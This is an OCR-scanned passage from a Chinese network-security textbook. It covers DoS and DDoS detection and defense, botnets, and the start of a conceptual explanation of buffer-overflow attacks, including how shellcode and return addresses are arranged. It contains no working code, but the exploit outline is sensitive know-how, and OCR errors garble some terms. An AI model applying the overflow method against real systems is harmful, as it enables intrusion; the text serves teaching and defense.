法 正常 运行 。 为 了 有 效 地 检测 这 种 攻击 ,并 对 这 类 攻击 进行 防范 ,还 可 以 使 用 多 种 网 络 安全 
的 专用 设备 和 工具 ,这 些 设备 和 工具 主要 有 : 防火 墙 ,基于 主机 的 IDS 一 一 入 侵 检测 系统 ， 
基于 特征 的 网 络 入 侵 检 测 系 统 和 网 络 异 常 行为 检测 器 。 

1) 防火 墙 

防火 墙 采用 包 过 滤 技 术 对 进出 内 部 网 络 的 数据 包 进 行 分 析 判 断 , 将 符合 过 滤 规 则 的 数 
据 包 进 行 转发 ,可 以 抵御 常见 的 一 些 DoS 攻击 或 其 他 攻击 。Cisco PIX Firewall 提供 了 一 种 
称 为 Flood Defender 的 功能 ,能 够 抵御 TCP SYN 洪流 的 攻击 。Flood Defender 的 工作 原 
理 是 : 检查 连接 到 指定 服务 上 的 未 回答 SYN 的 数量 ,如 果 出 现 异常 情况 ,对 之 后 的 连接 采 
取 限 制 , 即 当 达 到 限制 数量 时 ,所 有 其 他 连接 都 被 丢弃 ,以 保护 内 部 服务 器 。 关 于 防火 墙 的 
工作 原理 和 详细 功能 后 面 还 会 专门 介绍 。 

2) 入 侵 检测 系统 IDS 

入 侵 检测 技术 也 叫 网 络 实时 监控 技术 ,是 指 通过 硬件 或 软件 对 网 络 上 的 数据 流 进行 实 
时 的 检查 ,并 与 系统 中 的 入 侵 特征 数据 库 进 行 比较 ,一 旦 发 现 有 被 攻击 的 迹象 ,立刻 根据 用 
户 所 定义 的 动作 做 出 反应 ,如 切断 网 络 连 接 , 或 者 通知 防火 墙 系统 对 访问 控制 策略 进行 调 
整 , 将 入 侵 的 数据 包 过 滤 掉 等 。 采 用 入 侵 检测 技术 的 设备 称 为 入 侵 检 测 系统 IDS, 通 常 按照 
部 署 的 位 置 和 所 起 的 作用 不 同 , 分 为 基于 主机 的 IDS 和 基于 网 络 的 IDS。 

基于 主机 的 IDS 通常 是 安装 在 被 重点 检测 的 主机 之 上 ,主要 是 对 该 主机 的 网 络 实时 连 
接 , 以 及 系统 审计 日 志 进 行 智 能 分 析 和 判断 ,如 果 其 中 的 主体 活动 十 分 可 疑 ,IDS 就 会 采取 
相应 的 措施 。 基 于 主机 的 入 侵 检测 系统 (IDS) 和 基于 主机 的 防火 墙 通过 监测 和 阻塞 未 请 求 
的 数据 包 来 检测 DoS 企图 。 但 是 ,尽管 安装 数 以 百 计 的 基于 主机 的 IDS 设备 有 这 种 可 能 ， 
但 实际 操作 难度 较 大 ,也 不 实际 。 安 装 .配置 及 持续 监控 这 些 设 备 所 花费 的 成 本 较 大 ,实施 
性 较 差 。 从 最 低 程 度 上 讲 ,建议 对 放置 在 非 军事 区 中 的 服务 器 配置 某 种 形式 的 软件 防火 墙 ， 
协助 阻止 针对 该 服务 器 的 DoS 攻击 或 其 他 攻击 。 

基于 网 络 的 IDS 放置 在 比较 重要 的 网 段 内 ,不 停 地 监视 网 段 中 的 各 种 数据 包 , 对 每 一 
个 数据 包 或 可 疑 的 数据 包 进 行 特征 分 析 , 如 果 数 据 包 与 产品 内 置 的 某 些 规则 吻合 ,IDS 就 会 
发 出 警报 甚至 自动 切断 网 络 连接 。 此 外 ,基于 网 络 的 IDS, 还 能 够 分 析 和 评估 网 络 流量 ,及 
时 发 现 可 能 的 DoS 攻击 。IDS 通常 作为 监视 已 知 DoS 攻击 的 常用 工具 ,它们 在 攻击 发 生 时 
能 及 时 发 出 警报 并 采取 相应 的 措施 。 例 如 ,Cisco 公司 的 IDS 4200 系列 设备 中 其 传感器 本 
身 就 含有 几 种 类 型 的 DoS 攻击 的 特征 ,能 及 时 检测 出 已 知 的 DoS 攻击 。 

3) 网 络 异常 检测 器 

尽管 入 侵 检测 系统 能 够 被 用 于 抵御 大 部 分 普通 的 DoS 攻击 ,但 对 抵御 0day 类 型 的 攻 
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击 则 效果 不 好 。 针 对 这 样 的 需求 ,出 现 了 网 络 异 常 检测 器 。 网 络 异 常 检测 器 主要 设计 用 于 
观察 不 寻常 的 网 络 流量 ,观察 的 结果 与 参考 点 相对 照 ,如 果 流 量 超出 了 一 定 的 限度 , 则 进行 
报警 ,并 采取 相应 的 应 对 措施 。 例 如 ,Cisco Traffic Anomaly Detector XT 就 是 一 款 这 样 的 
网 络 异 常 检测 器 , 它 能 够 监测 拒绝 服务 攻击 乃至 分 布 式 拒绝 服务 攻击 (DDoS) 的 网 络 流量 。 

4. 防范 DoS 攻击 的 其 他 方法 

检测 是 否 发 生 了 DoS 攻击 ,只 是 阻止 此 类 攻击 必 备 的 第 一 步 。 如 果 能 对 DoS 攻击 进行 
预防 , 则 可 以 大 幅度 地 减少 DoS 攻击 的 范围 ,显著 地 降低 系统 受 DoS 攻击 影响 的 程度 。 实 
际 上 ,再 好 的 防护 系统 也 无 法 阻止 所 有 的 攻击 ,只 能 减少 攻击 的 发 生 概 率 ,因此 应 该 首先 提 
高 系统 的 安全 性 ,使 系统 本 身 具有 和 较 好 的 攻击 抵抗 性 。 

提高 系统 安全 性 的 方法 通常 有 以 下 几 种 。 

g@ 安装 服务 包 和 修补 包 。 

@ 只 运行 必要 的 服务 。 

@ 安装 防火 墙 。 

@ 安装 入侵 检 测 系统 。 

@ 安装 防 病毒 软件 。 

@ 关闭 穿越 路 由 器 和 防火 墙 的 ICMP。 

一 个 设计 较 好 的 安全 性 高 的 系统 ,通常 是 上 述 这 些 方法 的 组 合 , 某 个 单独 的 产品 或 方法 
很 难 做 到 全 面 的 防护 。 

通过 安装 服务 包 , 能 够 最 大 限度 地 减少 因应 用 程序 和 协议 的 漏洞 被 攻击 的 机 会 。 通 常 ， 
软件 厂商 会 定期 发 布 修复 安全 漏洞 的 服务 包 和 修补 包 。 

此 外 ,还 应 对 系统 的 安全 性 进行 强化 配置 。 强 化 系统 的 安全 性 包括 两 部 分 : 强化 网 络 
设备 的 安全 性 和 强化 应 用 程序 的 安全 性 。 对 于 网 络 设备 来 说 ,其 设备 本 身 应 具备 一 定 的 安 
全 性 ,以 便 抵 御 各 种 攻击 对 设备 本 身 的 破坏 ,因为 一 旦 设备 受到 破坏 , 则 整个 网 络 系统 就 会 
产生 薄弱 点 ,易于 成 为 攻击 者 进入 的 入 口 。 对 于 应 用 程序 来 说 , 则 需要 加 强 自身 的 安全 性 
能 ,以 防 被 攻击 者 控制 或 植 入 其 他 攻击 程序 。 

5. 分 布 式 拒绝 服务 攻击 及 其 防范 

1) DDoS 攻击 的 基本 原理 

DDoS 攻击 手段 是 在 传统 的 DoS 攻击 基础 之 上 产生 的 一 类 攻击 方式 。 单 一 的 DoS 攻 
击 一 般 是 采用 一 对 一 方式 的 , 当 被 攻击 目标 的 CPU 速度 低 .内存 小 或 者 网 络 带宽 小 等 各 项 
性 能 指标 不 高 时 ,其 效果 是 明显 的 。 然 而 , 随 着 计算 机 与 网 络 技 术 的 发 展 ,计算 机 的 处 理 能 
力 迅 速 增长 ,内 存 大 大 增加 ,同时 也 出 现 了 千 兆 级 别 乃至 万 兆 级 别 的 网 络 ,这 就 使 得 DoS 攻 
击 的 困难 程度 加 大 了 ,因为 目标 对 恶意 攻击 包 的 “消化 能 力 ” 大 大 提高 ,一 对 一 的 攻击 方式 就 
不 会 产生 什么 效果 。 

在 这 种 情况 下 ,分 布 式 拒绝 服务 攻击 手段 (DDoS) 就 应 运 而 生 了 。 假 如 被 攻击 目标 的 计 
算 机 与 网 络 的 处 理 能 力 加 大 了 10 倍 , 采 用 原来 的 一 对 一 方式 时 用 一 台 攻 击 机 来 攻击 不 再 能 
起 作用 的 话 , 此 时 若 攻击 者 使 用 10 台 甚 至 更 多 的 攻击 机 同时 进行 攻击 , 则 一 定 会 达到 攻击 
的 目的 ,因此 ,DDoS 攻击 就 是 利用 更 多 的 攻击 机 (又 称 倪 伟 机 ) 来 发 起 进攻 ,以 比 从 前 更 大 
的 规模 来 进攻 受害 者 的 一 种 攻击 方式 。 
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高 速 广泛 连接 的 网 络 给 大 家 带 来 了 方便 ,也 为 DDoS 攻击 创造 了 极为 有 利 的 条 件 。 在 
低速 网 络 时 代 ,黑客 占领 攻击 用 的 佛 儒 机 时 ,总 是 会 优先 考虑 离 目标 网 络 距离 近 的 机 器 , 因 
为 经 过 路 由 器 的 跳 数 少 ,效果 好 。 而 现在 电信 和 骨干 结 点 之 间 的 连接 都 是 以 Gb/s 速率 为 级 
别 的 ,大 城市 之 间 更 可 以 达到 2. 5Gb/s 乃至 更 高 速率 的 连接 ,这 使 得 攻击 可 以 从 更 远 的 地 
方 或 者 其 他 城市 发 起 (甚至 在 境外 进行 ) ,攻击 者 的 倪 伟 机 位 置 可 以 分 布 在 更 大 的 范围 ,因而 
攻击 的 范围 更 大 、 隐 项 性 更 强 。 

DDoS 攻击 的 示意 图 如 图 5-3 所 示 。DDoS 与 DoS 攻击 的 原理 基本 相同 。 攻 击 者 首先 
通过 植 入 某 种 特定 程序 (僵尸 程序 ,bot 程序 ,一 段 可 以 自动 执行 预先 设 定 功 能 ,可 以 被 控 
制 ,具有 一 定 人 工 智能 的 程序 ,该 程序 可 以 通过 木马 .蠕虫 等 进行 传播 ) 控 制 若干 台 机 器 作为 
主 控 端 (控制 便 偶 机 ) ,然后 通过 该 主 控 端 向 更 多 的 机 器 植 人 某 种 攻击 程序 ,由 这 些 代 理 端 
(攻击 倪 偶 机 ?向 目标 主机 发 起 攻击 的 一 种 攻击 方式 。 


和 国 / 光 所 
合 偶 机 机 
( 主 控油 )~ -一 (代理 端 ) 


图 5-3 DDoS 攻击 过 程 示意 图 


由 于 在 DDoS 攻击 中 ,攻击 者 和 受 攻击 机 器 的 力量 对 比 非常 悬殊 ,在 这 种 悬殊 的 力量 对 
比 下 ,被 攻击 的 主机 很 快 失去 反应 ,无 法 提供 服务 ,从 而 达到 攻击 的 目的 。 目 前 ,这 种 攻击 方 
式 是 实施 最 为 快速 .攻击 能 力 最 强 、 破 坏 性 最 大 的 一 种 方式 。 

2) 僵尸 网 络 

由 攻击 者 植 和 人 僵尸 程序 的 计算 机 (这 些 计算 机 受 黑客 控制 ,有 时 也 成 为 肉鸡 ) 组 成 的 网 
络 称 为 僵尸 网 络 (Botnet) ,该 网 络 是 由 大 量 能 够 实现 恶意 功能 的 Bot、Command & Control 
Server( 命 令 和 控制 服务 器 ,控制 者 通过 该 服务 器 发 送 命令 ,进行 控制 ) 和 控制 者 组 成 ,能 够 
受 攻击 者 控制 的 网 络 。Botnet 并 不 是 指 物 理 意 义 上 具有 拓扑 架构 的 网 络 , 它 具有 一 定 的 分 
布 性 ,该 网 络 会 随 着 Bot 程序 的 不 断 传播 ,而 不 断 有 新 位 置 的 僵尸 计算 机 添加 到 这 个 网 络 中 
来 ,从 而 可 以 使 网 络 结 点 的 规模 快速 扩大 。 

僵尸 程序 与 蠕虫 最 大 的 区 别 就 在 于 蠕虫 具有 主动 传播 性 ,另外 蠕虫 的 攻击 行为 不 受 人 
控制 ,而 相反 僵尸 程序 的 存在 就 是 为 了 使 得 攻击 者 能 够 控制 受 感染 的 计算 机 。 僵 尸 程序 和 
木马 有 着 功能 的 相似 性 一 一 远程 控制 计算 机 ,但 在 功能 实现 上 略 有 区 别 ,僵尸 程序 都 能 突破 
内 网 和 防火 墙 限制 ,这 是 传统 正 向 连接 的 木马 无 法 比拟 的 。 僵 尸 程序 使 用 特有 的 IRC 协议 
下 的 DCC 命令 或 者 其 他 载体 进行 传播 ,由 于 预 设 指 令 的 存在 ,传播 过 程 更 显 主动 , 且 受 感染 
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的 计算 机 仍 受 控制 ,这 些 比 起 木马 技术 来 说 更 加 先进 和 隐藏 。 

Botnet 的 最 主要 的 特点 是 . 它 有 别 于 以 往 简 单 的 安全 事件 ,是 一 个 具有 极 大 危害 的 攻 
击 平台 。 它 可 以 一 对 多 地 执行 相同 的 恶意 行为 ,将 攻击 源 从 一 个 转化 为 多 个 ,乃至 一 个 庞大 
的 网 络 体系 , 通 过 网 络 来 控制 受 感染 的 系统 ,造成 更 大 程度 的 网 络 危 害 ,比如 可 以 同时 对 某 
目标 网 站 进行 DDoS 攻击 ,同时 发 送 大量 的 垃圾 邮件 , 短 时 间 内 窃取 大 量 敏 感 信息 、 抢 占 系 
统 资源 甚至 进行 非法 目的 件 利 等 。 

僵尸 网 络 正 是 这 种 一 对 多 的 控制 关系 ,使 得 攻击 者 能 够 以 极 低 的 代价 高 效 地 控制 大 量 
的 资源 为 其 服务 ,在 执行 恶意 行为 的 时 候 ,Botnet 充当 了 一 个 攻击 平台 的 角色 ,这 也 就 使 得 
Botnet 不 同 于 简单 的 病毒 和 蠕虫 ,也 与 通常 意义 的 木马 有 所 不 同 。 目 前 ,僵尸 网 络 已 经 成 
为 网 络 钓鱼 .传播 垃圾 邮件 和 色情 文学 .实施 点 击 欺 诈 和 经 济 犯罪 的 重要 平台 。2011 年 ,我 
国 受 境外 4.7 万 个 IP 地 址 的 控制 服务 器 控制 着 的 僵尸 网 络 的 主机 数量 达到 890 万 。 

僵尸 网 络 的 危害 主要 如 下 。 

@ 远程 完全 控制 系统 。 伪 尸 程序 一 旦 侵入 系统 ,会 像 木 马 一 样 隐藏 自身 ,企图 长 期 潜 
伏 在 受 感染 系统 中 ,随时 等 待 远程 控制 者 的 操作 命令 。 

@ 释放 蠕虫 。 传 统 蠕虫 的 初次 传播 属于 单 点 辐射 型 ,如 果 疫 情 发 现 得 早 , 可 以 很 好 地 
定位 并 抑制 蠕虫 的 深度 传播 ; 而 僵尸 网 络 的 存在 ,使 得 蠕虫 传播 的 基点 更 高 。 在 很 大 的 范 
围 内 ,将 可 能 同时 爆发 蠕虫 疫情 。 僵 尸 计算 机 的 分 布 广泛 且 数量 极 多 ,导致 破坏 程度 成 几何 
倍数 增长 ,使 蠕虫 起 源 更 加 具有 迷惑 性 ,给 定位 工作 增加 了 巨大 的 难度 。 

@ 发 起 分 布 式 拒绝 服务 攻击 。DDoS 已 经 成 为 僵尸 网 络 造成 的 最 大 最 直接 的 危害 之 
一 。 攻 击 者 通过 庞大 的 僵尸 网 络 发 送 攻击 指令 给 活跃 的 (甚至 暂时 处 于 非 活跃 状态 的 ) 僵 己 
计算 机 ,可 以 同时 对 特定 的 网 络 目标 进行 持续 的 访问 或 者 扫描 ,由 于 攻击 者 可 以 任意 指定 攻 
击 时 间 并 发 任务 个 数 ,以 及 攻击 的 强度 ,使 这 种 新 式 的 拒绝 服务 攻击 具有 传统 拒绝 服务 攻 
击 所 不 可 比拟 的 强度 和 危害 。 

@ 窃取 敏感 信息 。 由 于 僵尸 计算 机 被 远程 攻击 者 完全 控制 ,存储 在 受 感染 计算 机 上 的 
一 切 敏感 信息 都 将 暴露 无 遗 ,用 户 的 一 举 一 动 都 在 攻击 者 的 监视 之 中 。 

@ 发 送 垃圾 邮件 。 垃 圾 邮件 给 人 们 的 日 常生 活 造成 了 极 大 的 障碍 ,而 利用 僵尸 网 络 
发 送 垃圾 邮件 ,首先 可 以 隐藏 自身 的 真实 IP, 躲 避 法 律 的 追究 ; 其 次 ,可 以 在 短 时 间 内 发 
送 更 多 的 垃圾 邮件 ; 再 次 , 反 垃 圾 邮件 的 工作 和 一 些 过 滤 工 具 无 法 完全 拦截 掉 这 些 垃圾 
邮件 。 

@ 强占 小 用 系统 资源 ,进行 非法 牟利 活动 。 僵 尸 网 络 一 旦 形成 ,就 相当 于 给 控制 者 提 
供 了 大 量 的 免费 的 网 络 和 计算 机 资源 ,控制 者 利用 这 些 资 源 进行 非法 的 暴利 谋取 。 暴 利 谋 
取 的 手段 包括 : 种 植 广告 件 . 增 加 网 站 访问 量 .参与 网 络 赌博 .下 载 各 类 数据 资料 .建立 虚假 
网 站 进行 网 络 钓鱼 等 。 

@) 作为 跳板 ,实施 二 次 攻击 。 攻 击 者 利用 僵尸 程序 ,在 受 感染 主机 上 打开 各 种 服务 器 
代理 或 者 重 定向 器 ,发 起 其 他 攻击 破坏 ,而 这 样 可 以 隐藏 自己 的 真实 位 置 , 不 容易 被 发 现 。 

总 之 ,僵尸 网 络 不 是 一 种 单一 的 网 络 攻击 行为 ,而 是 一 种 网 络 攻击 的 平台 和 其 他 传统 网 
络 攻击 手段 的 负载 综合 ,通过 僵尸 网 络 可 以 控制 大 量 的 计算 机 进行 更 快 , 更 猛烈 的 网 络 攻 
击 , 这 给 普通 用 户 和 整个 互联 网 的 健康 发 展 造成 了 严重 的 危害 。 

当前 ,新 一 代 的 僵尸 网 络 更 加 智能 化 和 追求 利益 最 大 化 。 传 统 的 僵尸 网 络 更 多 的 是 进 
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行 DDoS 攻击 ,而 从 2008 年 开始 ,已 经 转变 到 利用 庞大 的 僵尸 兵团 来 完成 点 击 广告 \ 刷 网 络 
流量 等 以 谋求 经 济 利益 的 目的 上 来 ,僵尸 网 络 控制 技术 更 是 由 原来 的 不 可 控 变 成 了 可 控制 ， 
实现 了 指 哪 打 哪 的 新 型 战术 ,这 对 防范 僵尸 网 络 带 来 了 更 大 的 挑战 。 

对 于 僵尸 网 络 攻击 的 防范 ,主要 有 以 下 的 措施 。 

@ 对 网 络 和 主机 的 各 种 运行 状态 时 刻 保 持 警 惕 ,提高 警觉 性 ,注意 定期 查看 系统 日 志 ， 
监控 连接 到 网 络 和 主机 的 各 种 链接 。 对 个 人 Windows 用 户 而 言 , 还 应 做 到 自动 升级 .设置 
复杂 口令 .不 运行 可 疑 邮件 ,这 样 ,可 以 避免 多 数 恶意 代码 的 侵袭 。 

@ 监测 端口 。 因 为 即使 是 最 新 的 bot 程序 进行 通信 时 ,它们 也 是 需要 通过 端口 来 实现 
的 。 绝 大 部 分 的 bot 仍然 使 用 IRC (端口 6667) 和 其 他 端口 号 较 大 的 端口 (如 31337 和 
54321)。1024 以 上 的 所 有 端口 通常 应 设置 为 阻止 bot 进入 。 另 外 ,还 可 以 对 开放 的 端口 制 
定 通信 政策 “只 在 办 公 时 间 开 放 ” 或 者 “拒绝 所 有 访问 ,除了 以 下 IP 地 址 列表 ”等 。 

@ 禁用 JavaScript。 当 一 个 bot 程序 感染 主机 的 时 候 , 往 往 是 基于 Web 利用 漏洞 执行 
JavaScript 来 实现 。 可 以 设置 浏览 器 在 执行 JavaScript 之 前 进行 提示 ,这样 有 助 于 最 大 化 地 
减少 因 JavaScript 而 感染 bot 的 机 会 。 

@ 多 层面 防御 , 即 采 用 多 个 不 同 层次 不 同 作用 的 防御 工具 ,这 样 ,可 以 提高 综合 防御 
效果 。 

@ 安全 评估 。 通 常 ,厂商 都 会 提供 免费 的 安全 评估 工具 ,这 些 工 具 可 以 评估 用 户 网 络 
所 面临 的 不 同类 型 的 安全 风险 和 安全 漏洞 ,并 提供 安全 措施 的 建议 。 

3) DDoS 攻击 的 检测 与 防范 

要 判断 是 否 受 到 DDoS 攻击 ,首先 应 对 该 攻击 进行 检测 ,一般 情 况 下 ,有 下 列 情况 时 ,就 
有 可 能 出 现 了 DDoS 攻击 。 

@ 系统 服务 器 CPU 利用 率 极 高 ,处理 速 度 缓慢 ,甚至 宕 机 。 

@ 高 流量 无 用 数据 造成 网 络 拥塞 ,使 受害 主机 无 法 正常 和 外 界 通 信 。 

@ 反复 高 速 地 发 出 特定 的 服务 请 求 , 使 受害 主机 无 法 及 时 处 理 所 有 正常 请 求 。 

@ 被 攻击 主机 上 有 大 量 等 待 的 TCP 连接 。 

@ 被 DDoS 攻击 后 ,服务 器 出 现 木马 、 洲 出 等 异常 现象 。 

当然 ,有 时 候 DDoS 攻击 比较 隐蔽 ,检测 比较 困难 ,这 时 ,就 要 对 系统 进行 综合 测试 和 评 
估 ,并 采用 专业 的 工具 进行 检测 。 

防范 DDoS 攻击 是 一 个 系统 工程 ,必须 对 系统 进行 全 面 的 安全 检查 , 仅 依靠 某 种 系统 或 
产品 防范 全 部 的 DDoS 攻击 是 不 现实 的 。 尽 管 完 全 杜绝 DDoS 攻击 无 法 做 到 ,但 通过 安装 
网 络 安全 设备 ,并 采取 相应 的 安全 措施 ,可 以 抵御 90% 以 上 的 DDoS 攻击 。 防 范 DDoS 攻击 
的 措施 很 多 ,前 面 介绍 的 防范 僵尸 网 络 攻击 的 措施 大 部 分 也 适用 于 防范 DDoS 攻击 。 此 外 ， 
还 应 采取 以 下 的 措施 。 

@ 采用 高 性 能 的 网 络 设备 。 要 保证 网 络 设备 不 能 成 为 瓶颈 ,因此 选择 路 由 器 、 交 换 机 、 
硬件 防火 墙 等 设备 的 时 候 要 尽量 选用 知名 度 高 口碑 好 、 性 能 优异 的 产品 ,这 样 可 以 在 一 定 
程度 上 提高 抗 攻击 的 程度 。 

@ 应 有 充足 的 网 络 带宽 保证 。 网 络 带 宽 直 接 决 定 了 能 抗 受 攻击 的 能 力 ,同样 情况 下 ， 
1000Mb/s 带宽 的 网 络 抗 攻击 的 能 力 较 10Mb/s 带宽 的 网 络 高 几 十 倍 。 

@ 安装 专业 抗 DDoS 攻击 的 防火 墙 。 专 业 抗 DDoS 攻击 的 防火 墙 采用 内 核 提前 过 滤 
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技术 、 反 向 探测 技术 、 指 纹 识别 技术 等 多 项 技术 来 发 现 和 提前 过 滤 DDoS 非法 数据 包 , 可 以 
智能 抵御 DoS 攻击 。 

另外 ,对 于 防火 墙 还 应 进行 相应 的 设置 ,包括 : 禁止 对 主机 的 非 开放 服务 的 访问 ,限制 
同时 打开 的 SYN 最 大 连接 数 ,限制 特定 IP 地 址 的 访问 ,启用 防火 墙 的 防 DDoS 攻击 的 属 
性 ,严格 限制 对 外 开放 的 服务 器 的 向 外 访问 等 。 

@ 对 于 主机 ,应 进行 相应 的 设置 ,包括 : 关闭 不 必要 的 服务 ,限制 同时 打开 的 SYN 半 
连接 数目 ,缩短 SYN 半 连 接 的 time out 时 间 , 及 时 更 新 系统 补丁 等 。 

对 于 网 络 设备 特别 是 路 由 器 应 进行 适当 的 安全 设置 。 此 处 给 出 了 以 Cisco 路 由 器 为 
例 的 安全 设置 : 使 用 Cisco Express Forwarding (CEF) 功 能 ,使 用 unicast reverse-path 功 
能 ,设置 访问 控制 列表 (ACL) 过 滤 , 设 置 SYN 数据 包 流 量 速率 ,升级 版 本 过 低 的 ISO ,为 路 
由 器 建立 log server 等 。 


5.2.4 缓冲 区 溢出 攻击 及 其 防范 方法 


1. 缓冲 区 溢出 攻击 概述 

在 过 去 的 十 几 年 中 ,以 缓冲 区 溢出 为 攻击 类 型 的 安全 漏洞 是 最 为 常见 的 一 种 形式 。 更 
为 严重 的 是 ,缓冲 区 溢出 漏洞 占 了 远程 网 络 攻 击 的 绝 大 多 数 ,这 种 攻击 可 以 使 得 一 个 匿名 的 
网 上 用 户 获 得 一 台 主 机 的 部 分 和 全 部 的 控制 权 。 当 用 户 拥有 了 管理 员 权限 的 时 候 , 将 会 给 
主机 造成 极其 严重 的 安全 威胁 。 如 今 , 缓 冲 区 溢出 的 错误 正 源源 不 断 地 从 UNIX、 
Windows 路由器、 网 关 以 及 其 他 的 网 络 设备 中 被 发 现 , 并 构成 了 对 系统 安全 威胁 数量 最 大 、 
程度 较 大 的 一 类 。 

缓冲 区 溢出 之 所 以 成 为 一 种 常见 的 攻击 手段 ,其 原因 在 于 很 容易 造成 缓冲 区 溢出 漏洞 。 
而 且 缓 冲 区 溢出 能 够 成 为 远程 攻击 的 主要 手段 ,原因 在 于 攻击 者 利用 缓冲 区 溢出 漏洞 , 植 入 
并 且 执 行 攻击 代码 一 一 含有 缓冲 区 溢出 的 代码 ,被 植 入 的 代码 在 一 定 的 权限 下 运行 之 后 , 攻 
击 者 就 可 以 获得 攻击 主机 的 控制 权 。 

缓冲 区 溢出 是 指 将 一 个 超过 缓冲 区 长 度 的 字符 串 放 入 缓冲 区 的 结果 。 向 一 个 有 限 空间 
的 缓冲 区 中 植 人 超 长 的 字符 串 可 能 会 出 现 两 个 结果 ,一 是 过 长 的 字符 串 覆 盖 了 相 邻 的 存储 
单元 ,引起 程序 运行 失败 ,严重 的 可 导致 系统 崩溃 ; 另 有 一 个 结果 就 是 利用 这 种 漏洞 可 以 执 
行 任意 指令 ,甚至 可 以 取得 系统 root 权限 。 大 多 造成 缓冲 区 溢出 的 原因 是 程序 中 没有 仔细 
检查 用 户 输入 参数 而 造成 的 。 

缓冲 区 是 程序 运行 的 时 候 机 器 内 存 中 的 一 个 连续 块 , 它 保存 了 给 定 类 型 的 数据 , 随 着 动 
态 分 配 变量 会 出 现 问题 。 大 多 时 候 为 了 不 占用 太 多 的 内 存 , 一 个 有 动态 分 配 变量 的 程序 在 
程序 运行 时 才 决 定 给 它们 分 配 多 少 内 存 。 现 在 假设 ,如 果 一 个 程序 要 在 动态 分 配 缓冲 区 放 
入 超 长 的 数据 ,数据 就 会 溢出 。 一 个 缓冲 区 溢出 程序 使 用 这 个 溢出 的 数据 将 汇编 语言 代码 
放 到 机 器 的 内 存 里 ,通常 是 产生 root 权限 的 地 方 ,这 就 会 给 系统 产生 极 大 的 威胁 。 这 样 看 
来 缓冲 区 溢出 并 不 是 产生 威胁 的 根本 原因 ,而 是 当 溢 出 到 能 够 以 root 权限 运行 命令 的 区 
域 ,那样 攻击 者 就 相应 地 拥有 了 目标 主机 的 最 高 使 用 权限 。 

从 上 面 的 缓冲 区 溢出 概念 可 以 看 出 ,缓冲 区 溢出 是 将 一 个 超过 缓冲 区 长 度 的 字符 串 置 
入 缓冲 区 的 结果 ,这 是 由 于 程序 设计 语言 的 一 些 漏 洞 . 如 C/C++ 语言 中 ,不 对 缓冲 区 、 数 组 
及 指针 进行 边界 检查 (strcpy() 、strcat()、sprintf()、gets() 等 语句 )。 如 果 向 程序 的 有 限 空 
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间 的 缓冲 区 中 置 入 过 长 的 字符 串 ,造成 缓冲 区 溢出 ,从 而 破坏 程序 的 堆栈 ,使 程序 转 去 执行 
其 他 的 指令 ,如 果 这 些 指 令 是 放 在 有 Root 权限 的 内 存 里 ,那么 一 旦 这 些 指令 得 到 了 运行 ， 
入 侵 者 就 以 Root 的 权限 控制 了 系统 ,这 也 是 人 们 所 说 的 U2R(User to Root Attacks)。 例 
如 在 UNIX 系统 中 ,使 用 一 些 精心 编写 的 程序 ,利用 SUID 程序 (如 FDFORMAT) 中 存在 的 
缓冲 区 溢出 错误 就 可 以 取得 系统 超级 用 户 权 限 ,在 UNIX 中 取得 超级 用 户 权限 就 意味 着 黑 
客 可 以 随意 控制 系统 。 

一 个 利用 缓冲 区 溢出 而 企图 破坏 或 非法 进入 系统 的 程序 通常 由 如 下 几 部 分 组 成 。 

Q@ 准备 一 段 可 以 调用 一 个 shell 的 机 器 码 形成 的 字符 串 , 称 为 shellcode。 

@ 申请 一 个 缓冲 区 ,并 将 机 器 码 填 人 缓冲 区 的 低 端 。 

@ 估算 机 器 码 在 堆栈 中 可 能 的 起 始 位 置 , 并 将 这 个 位 置 写 入 缓冲 区 的 高 端 。 这 个 起 始 
的 位 置 也 是 执行 这 一 程序 时 需要 反复 调用 的 一 个 参数 。 

@ 将 这 个 缓冲 区 作为 系统 一 个 有 缓冲 区 溢出 错误 程序 的 入 口 参数 ,并 执行 这 个 有 错误 
的 程序 。 

在 UNIX 系统 中 ,使 用 一 类 精心 编写 的 程序 ,利用 suid 程序 中 存在 的 这 种 错误 可 以 很 
轻易 地 取得 系统 的 超级 用 户 的 权限 。 当 服务 程序 在 端口 提供 服务 时 ,缓冲 区 溢出 程序 可 以 
轻易 地 将 这 个 服务 关闭 ,使 得 系统 的 服务 在 一 定 的 时 间 内 瘫痪 ,严重 的 可 能 使 系统 立刻 死 
机 ,从 而 变 成 一 种 拒绝 服务 的 攻击 。 这 种 错误 不 仅 是 程序 员 的 错误 ,系统 本 身 在 实现 的 时 候 
出 现 这 种 错误 的 更 多 。 

2. 缓冲 区 溢出 攻击 的 类 型 

缓冲 区 溢出 的 目的 在 于 扰乱 具有 某 些 特权 运行 程序 的 功能 ,这 样 就 可 以 让 攻击 者 取得 
程序 的 控制 权 , 如 果 该 程序 具有 足够 的 权限 ,那么 整个 主机 甚至 服务 器 就 被 控制 了 。 一 般 而 
言 ,攻击 者 攻击 root 程序 ,然后 执行 类 似 *exec(sh)” 的 执行 代码 来 获得 root 的 shell。 但 并 
不 总 是 这 样 ,为 了 达到 这 个 目的 ,攻击 者 必须 达到 如 下 两 个 目标 : 四 在 程序 的 地 址 空间 里 安 
排 适当 的 代码 ; @ 通 过 适当 地 初始 化 寄存 器 和 存储 器 ,让 程序 跳 转 到 安排 好 的 地 址 空间 执 
行 。 可 以 根据 这 两 个 目标 来 对 缓冲 区 溢出 攻击 进行 分 类 。 

1) 在 程序 的 地 址 空间 里 安排 适当 的 代码 

有 如 下 两 种 在 攻击 程序 地 址 空间 里 安排 攻击 代码 的 方法 。 

Oz 植 和 法。 攻击 者 向 被 攻击 的 程序 输入 一 个 字符 串 ,程序 会 把 这 个 字符 串 放 到 缓冲 区 
里 。 这 个 字符 串 所 包含 的 数据 是 可 以 在 这 个 被 攻击 的 硬件 平台 运行 的 指令 流 。 在 这 里 攻击 
者 用 被 攻击 程序 的 缓冲 区 来 存放 攻击 代码 ,具体 方式 有 以 下 两 种 差别 : 攻击 者 不 必 为 达到 
此 目的 而 溢出 任何 缓冲 区 ,可 以 找到 足够 的 空间 来 放置 攻击 代码 ; 缓冲 区 可 设 在 任何 地 方 : 
堆栈 (存放 自动 变量 ) 、 堆 (动态 分 配 区 ) 和 静态 数据 区 (初始 化 或 未 初始 化 的 数据 ) 。 

@ 利用 已 经 存在 的 代码 的 方法 。 有 时 候 攻击 者 所 要 的 代码 已 经 存在 于 被 攻击 的 程序 
中 了 ,攻击 者 所 要 做 的 只 是 对 代码 传递 一 些 参数 ,然后 使 程序 跳 转 到 想 要 执行 的 代码 那里 。 
